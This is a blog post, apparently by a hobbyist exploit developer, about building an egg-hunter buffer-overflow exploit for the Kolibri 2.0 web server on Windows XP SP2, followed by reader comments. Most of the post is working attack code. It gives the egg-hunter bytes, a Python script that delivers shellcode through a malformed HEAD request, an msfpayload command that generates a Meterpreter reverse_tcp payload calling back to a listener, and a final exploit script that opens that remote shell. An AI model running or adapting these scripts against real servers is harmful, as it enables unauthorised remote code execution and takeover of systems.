Over this vacation I thought of learning to use egg hunters in exploit development. This is just a small write-up, written right after successfully running my meterpreter reverse_tcp shellcode. This is the original exploit, published in 2010: http://www.exploit-db.com/exploits/15834/. I wanted to implement an egg hunter that searches the heap, stack, etc. for our shellcode by its tag. Egg hunters are used when we have limited buffer space.
Download the vulnerable Kolibri server: http://www.exploit-db.com/wp-content/themes/exploit/applications/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip
I assume you have a good knowledge of developing stack-based buffer overflow exploits, of registers, little-endianness, etc., which are the very basics.
I developed this exploit under Windows XP SP2 using USER32.dll, an operating system DLL, to find a jump to ESP (JMP ESP) instruction. This application doesn't load any DLLs of its own, so the return address has to come from a system DLL and the exploit is platform dependent.
As I mentioned earlier, this is a very brief write-up. The offset is at 515 bytes. Our plan is to overwrite the EIP register with our JMP ESP address, and from there jump 60 bytes backwards to the start of our hunter so that it gets executed. The hunter then searches through memory for the tag and executes our shellcode. The opcode for a short jmp is EB and -60 as a signed byte is C4, so the jump bytes would be \xeb\xc4.
I will be using an egg hunter based on NtDisplayString. Our egg hunter is 32 bytes and the egg, of course, is 8 bytes (the 4-byte tag written twice).
[code language=”python”]
6681CAFF0F or dx,0x0fff
42 inc edx
52 push edx
6A43 push byte +0x43
58 pop eax
CD2E int 0x2e
3C05 cmp al,0x5
5A pop edx
74EF jz 0x0
B86f736361 mov eax,0x6f736361; Our tag osca
8BFA mov edi,edx
AF scasd
75EA jnz 0x5
AF scasd
75E7 jnz 0x5
FFE7 jmp edi
[/code]
So the shellcode for the above egg hunter would be the following. Note that the listing above pushes 0x43 (NtDisplayString) while the byte string pushes 0x02, the NtAccessCheckAndAuditAlarm system call number from skape's paper; either call works as the hunter's page probe, and 0x02 is what the exploits in this post actually use.
[code language="python"]
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8" + "osca" + "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
[/code]
This is my proof-of-concept exploit code, which pops the calculator.
[code language=”python”]
#!/usr/bin/python
import socket
import os
import sys
egghunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x6f\x73" #os
"\x63\x61\x8b\xfa" #ca
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
# Our tag for the egghunter is "osca", which is "\x6f\x73\x63\x61" in hex
shellcode=(
"\x89\xe6\xda\xc9\xd9\x76\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
"\x4c\x48\x68\x6d\x59\x55\x50\x33\x30\x37\x70\x43\x50\x4c\x49"
"\x38\x65\x46\x51\x6a\x72\x33\x54\x6c\x4b\x51\x42\x74\x70\x6e"
"\x6b\x51\x42\x36\x6c\x6e\x6b\x53\x62\x67\x64\x4e\x6b\x43\x42"
"\x54\x68\x46\x6f\x78\x37\x70\x4a\x34\x66\x34\x71\x6b\x4f\x35"
"\x61\x4b\x70\x6c\x6c\x67\x4c\x73\x51\x63\x4c\x74\x42\x34\x6c"
"\x75\x70\x39\x51\x78\x4f\x56\x6d\x43\x31\x48\x47\x58\x62\x58"
"\x70\x32\x72\x32\x77\x6c\x4b\x50\x52\x52\x30\x6e\x6b\x30\x42"
"\x57\x4c\x46\x61\x58\x50\x4e\x6b\x33\x70\x30\x78\x6d\x55\x59"
"\x50\x30\x74\x32\x6a\x35\x51\x6e\x30\x76\x30\x6e\x6b\x63\x78"
"\x56\x78\x4c\x4b\x63\x68\x75\x70\x56\x61\x59\x43\x78\x63\x55"
"\x6c\x72\x69\x6c\x4b\x74\x74\x4e\x6b\x73\x31\x6a\x76\x54\x71"
"\x49\x6f\x46\x51\x39\x50\x6c\x6c\x59\x51\x6a\x6f\x76\x6d\x47"
"\x71\x7a\x67\x70\x38\x59\x70\x34\x35\x79\x64\x54\x43\x31\x6d"
"\x58\x78\x75\x6b\x31\x6d\x37\x54\x51\x65\x6d\x32\x43\x68\x4c"
"\x4b\x72\x78\x44\x64\x65\x51\x39\x43\x43\x56\x6e\x6b\x64\x4c"
"\x32\x6b\x6c\x4b\x56\x38\x57\x6c\x47\x71\x58\x53\x4c\x4b\x56"
"\x64\x6c\x4b\x37\x71\x78\x50\x4e\x69\x33\x74\x76\x44\x37\x54"
"\x31\x4b\x61\x4b\x43\x51\x31\x49\x70\x5a\x56\x31\x6b\x4f\x39"
"\x70\x71\x48\x71\x4f\x62\x7a\x4e\x6b\x62\x32\x7a\x4b\x4b\x36"
"\x33\x6d\x61\x7a\x35\x51\x4c\x4d\x6e\x65\x38\x39\x47\x70\x37"
"\x70\x33\x30\x46\x30\x33\x58\x76\x51\x4c\x4b\x62\x4f\x6c\x47"
"\x79\x6f\x58\x55\x4d\x6b\x68\x70\x6e\x55\x79\x32\x66\x36\x71"
"\x78\x39\x36\x5a\x35\x4f\x4d\x6f\x6d\x39\x6f\x38\x55\x65\x6c"
"\x63\x36\x33\x4c\x66\x6a\x4d\x50\x49\x6b\x49\x70\x34\x35\x64"
"\x45\x4d\x6b\x47\x37\x47\x63\x73\x42\x62\x4f\x30\x6a\x73\x30"
"\x72\x73\x79\x6f\x79\x45\x43\x53\x53\x51\x52\x4c\x32\x43\x76"
"\x4e\x35\x35\x31\x68\x72\x45\x75\x50\x41\x41")
junk = "A"*478
esp = "\x01\xaa\xd5\x77" #0x77 d5 aa 01 – USER32.dll
extra = "A"*5
jmp = "\xEB\xc4"
exploit = junk + egghunter + extra + esp + jmp
payload = "oscaosca" + shellcode
buffer = (
"HEAD /" + exploit + " HTTP/1.1\r\n"
"Host: 192.168.111.128:8080\r\n"
"User-Agent: " + payload + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8080)) # To exploit this locally use localhost; if not, use the external IP and port 8080
s.send(buffer)
s.close()
[/code]
As you can see above, we were able to get remote code execution using our egg hunter.
Okay, time to get a reverse shell and own the system. I will be using a Meterpreter reverse_tcp shellcode, as it is fairly fast and has more options to work with in Metasploit than a traditional connect-back shell.
[code language="bash"]msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.100 lport=4444 R | msfencode -e x86/alpha_mixed -t c[/code]
This is our final exploit with our reverse shell.
[code language=”python”]
#!/usr/bin/python
import socket
import os
import sys
print """
\t—————————————–
\t\033[39m+ Kolibri Web Server Egg Hunter Exploit +
\t\033[37m+ Exploit Developed for Windows XP SP2 +
\t\033[31m+ JMP ESP from USER32.dll +
\t\033[37m+ Exploit Developed by Osanda Malith +
\t——————————————
"""
egghunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x6f\x73" #os
"\x63\x61\x8b\xfa" #ca
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
# Our tag for the egghunter is "osca", which is "\x6f\x73\x63\x61" in hex
shellcode=(
"\x89\xe0\xd9\xe8\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x6b\x4c\x4b\x58\x4c\x49\x35\x50\x65\x50\x65\x50\x33\x50\x4c"
"\x49\x38\x65\x64\x71\x6a\x72\x51\x74\x4e\x6b\x61\x42\x64\x70"
"\x4e\x6b\x56\x32\x36\x6c\x6c\x4b\x76\x32\x55\x44\x4c\x4b\x72"
"\x52\x55\x78\x46\x6f\x4d\x67\x33\x7a\x34\x66\x54\x71\x4b\x4f"
"\x30\x31\x69\x50\x4c\x6c\x45\x6c\x30\x61\x31\x6c\x45\x52\x56"
"\x4c\x47\x50\x6b\x71\x38\x4f\x66\x6d\x63\x31\x79\x57\x58\x62"
"\x6c\x30\x71\x42\x31\x47\x4e\x6b\x36\x32\x36\x70\x4e\x6b\x30"
"\x42\x57\x4c\x57\x71\x78\x50\x6c\x4b\x77\x30\x74\x38\x4e\x65"
"\x6b\x70\x34\x34\x31\x5a\x66\x61\x48\x50\x36\x30\x6c\x4b\x73"
"\x78\x34\x58\x4c\x4b\x61\x48\x71\x30\x65\x51\x6e\x33\x78\x63"
"\x75\x6c\x30\x49\x6c\x4b\x74\x74\x6e\x6b\x37\x71\x59\x46\x46"
"\x51\x49\x6f\x35\x61\x6f\x30\x4c\x6c\x6a\x61\x5a\x6f\x44\x4d"
"\x73\x31\x6a\x67\x36\x58\x6d\x30\x73\x45\x59\x64\x35\x53\x61"
"\x6d\x4c\x38\x55\x6b\x73\x4d\x57\x54\x62\x55\x5a\x42\x46\x38"
"\x4c\x4b\x51\x48\x37\x54\x73\x31\x59\x43\x71\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x72\x78\x45\x4c\x76\x61\x78\x53\x4c\x4b"
"\x33\x34\x6e\x6b\x67\x71\x4e\x30\x4e\x69\x43\x74\x51\x34\x57"
"\x54\x43\x6b\x33\x6b\x53\x51\x72\x79\x53\x6a\x33\x61\x6b\x4f"
"\x49\x70\x70\x58\x43\x6f\x53\x6a\x6e\x6b\x54\x52\x68\x6b\x4f"
"\x76\x73\x6d\x43\x58\x37\x43\x34\x72\x65\x50\x77\x70\x52\x48"
"\x74\x37\x54\x33\x74\x72\x31\x4f\x51\x44\x70\x68\x32\x6c\x64"
"\x37\x34\x66\x46\x67\x6b\x4f\x48\x55\x6c\x78\x4e\x70\x47\x71"
"\x77\x70\x73\x30\x74\x69\x7a\x64\x36\x34\x52\x70\x53\x58\x35"
"\x79\x6f\x70\x50\x6b\x57\x70\x79\x6f\x78\x55\x72\x70\x46\x30"
"\x46\x30\x42\x70\x73\x70\x62\x70\x63\x70\x66\x30\x51\x78\x68"
"\x6a\x76\x6f\x59\x4f\x39\x70\x39\x6f\x38\x55\x4a\x37\x32\x4a"
"\x46\x65\x71\x78\x59\x50\x79\x38\x37\x71\x52\x44\x42\x48\x33"
"\x32\x37\x70\x52\x31\x51\x4c\x4e\x69\x5a\x46\x30\x6a\x54\x50"
"\x46\x36\x73\x67\x31\x78\x4f\x69\x49\x35\x43\x44\x65\x31\x69"
"\x6f\x4e\x35\x4e\x65\x4f\x30\x51\x64\x64\x4c\x39\x6f\x72\x6e"
"\x75\x58\x63\x45\x7a\x4c\x63\x58\x6a\x50\x6f\x45\x69\x32\x72"
"\x76\x6b\x4f\x38\x55\x50\x6a\x77\x70\x73\x5a\x33\x34\x30\x56"
"\x62\x77\x73\x58\x44\x42\x6e\x39\x59\x58\x53\x6f\x6b\x4f\x6e"
"\x35\x6c\x4b\x47\x46\x51\x7a\x33\x70\x71\x78\x53\x30\x64\x50"
"\x43\x30\x67\x70\x42\x76\x70\x6a\x47\x70\x35\x38\x61\x48\x6f"
"\x54\x63\x63\x4a\x45\x59\x6f\x5a\x75\x4a\x33\x71\x43\x62\x4a"
"\x45\x50\x52\x76\x70\x53\x46\x37\x33\x58\x75\x52\x5a\x79\x6a"
"\x68\x61\x4f\x69\x6f\x7a\x75\x35\x51\x78\x43\x37\x59\x49\x56"
"\x4e\x65\x4a\x56\x74\x35\x6a\x4c\x69\x53\x41\x41")
junk = "A"*478
esp = "\x01\xaa\xd5\x77" #0x77 d5 aa 01 – USER32.dll
extra = "A"*5
jmp = "\xEB\xc4"
#"\xcc" + "\xEB\xc4" # variant with an INT3 breakpoint in front of the jump, for debugging
exploit = junk + egghunter + extra + esp + jmp
payload = "oscaosca" + shellcode
buffer = (
"HEAD /" + exploit + " HTTP/1.1\r\n"
"Host: 172.16.71.135:8080\r\n"
"User-Agent: " + payload + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('172.16.71.135', 8080)) # To exploit this locally use localhost; if not, use the external IP and port 8080
    print '[+] Sending Evil Payload'
    s.send(buffer)
    s.close()
    print '\033[33m[+] Successfully Exploited the Buffer Overflow'
except:
    print "[-] Can't send evil buffer"
    sys.exit(0)
[/code]
That's it, we are in. Here is the output of the cool screenshot command from our Meterpreter shell on the Win XP machine.
Egg hunting is fun, isn't it? It took me about an hour to figure out the theory and develop this exploit from scratch. You could also give it a try by reading my example code. I am sorry that I haven't explained anything from the beginning, but this is just a small write-up for people who are already in this field. I will surely start writing detailed articles on exploit development if I get some more free time. Actually, exploit development needs lots of patience.
I made a quick video to celebrate my happiness after getting a nice little shell ^_^
[youtube=http://www.youtube.com/watch?v=XiTr2qsiZL8&feature=youtu.be]
Here is a good research paper by skape about egg hunting: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
As always, respect to Peter Van Eeckhoutte (corelanc0d3r) for his tutorials and exploits.
Great video (Y) keep it up
Nice One Bro, You got the talent
nice tutorial osa can’t explain its values in words
Nice one bro. Keep up your good work
Thank you all for the comments!
Nice Work Bro
Nice job and good write up coverage on things! Looking forward to more to come
Thanks! Sure I'll post more in my leisure time
Thanks for the comment!